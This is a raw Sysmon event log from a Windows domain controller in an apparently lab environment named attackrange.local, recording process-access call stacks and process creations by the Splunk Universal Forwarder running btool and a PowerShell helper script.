13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.014{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.939{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.939{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.878{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 